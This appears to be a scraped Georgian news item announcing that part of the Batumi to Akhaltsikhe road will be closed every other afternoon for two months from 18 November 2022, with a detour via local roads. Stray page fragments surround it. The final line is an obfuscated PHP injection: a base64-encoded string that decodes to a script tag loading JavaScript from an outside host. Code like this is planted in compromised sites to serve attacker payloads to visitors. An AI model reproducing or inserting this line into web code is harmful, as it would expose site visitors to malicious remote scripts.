celsiusi
ავერსი საქკაბელი
გზების დეპარტამენტი მძღოლებს აფრთხილებს და წერს, რომ ბათუმი-ახალციხის გზის გარკვეულ მონაკვეთზე შეზღუდვები წესდება:
 
საქართველოს საავტომობილო გზების დეპარტამენტთან გაფორმებული ხელშეკრულების საფუძველზე, შპს „გზა“ აწარმოებს შიდასახელმწიფოებრივი მნიშვნელობის ბათუმი (ანგისა) - ახალციხის საავტომობილო გზის კმ59-კმ68 მონაკვეთის დარჩენილ სარეაბილიტაციო სამუშაოებს.
 
აღნიშნული სამუშაოების წარმოების პროცესში, კმ67+020-კმ67+260 მონაკვეთზე, საჭიროა 2022 წლის 18 ნოემბრიდან 2 თვის განმავლობაში, ყოველ დღეგამოშვებით, აღნიშნული მონაკვეთის ჩაკეტვა 14:00 სთ-დან 18:00 სთ-მდე.
 
მონაკვეთის ჩაკეტვის პერიოდში, ავტოტრანსპორტი იმოძრავებს შემოვლითი გზით. კერძოდ, შიდასახელმწიფოებრივი მნიშვნელობის ბათუმი (ანგისა) -ახალციხის საავტომობილო გზის კმ65+720-დან (სოფ. გომარდულის ასახვევი) კმ67+920-მდე (სოფ. ჩანჩხალო) გამავალი ადგილობრივი მნიშვნელობის საავტომობილო გზების გამოყენებით, - წერს გზების დეპარტამენტი.
271
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");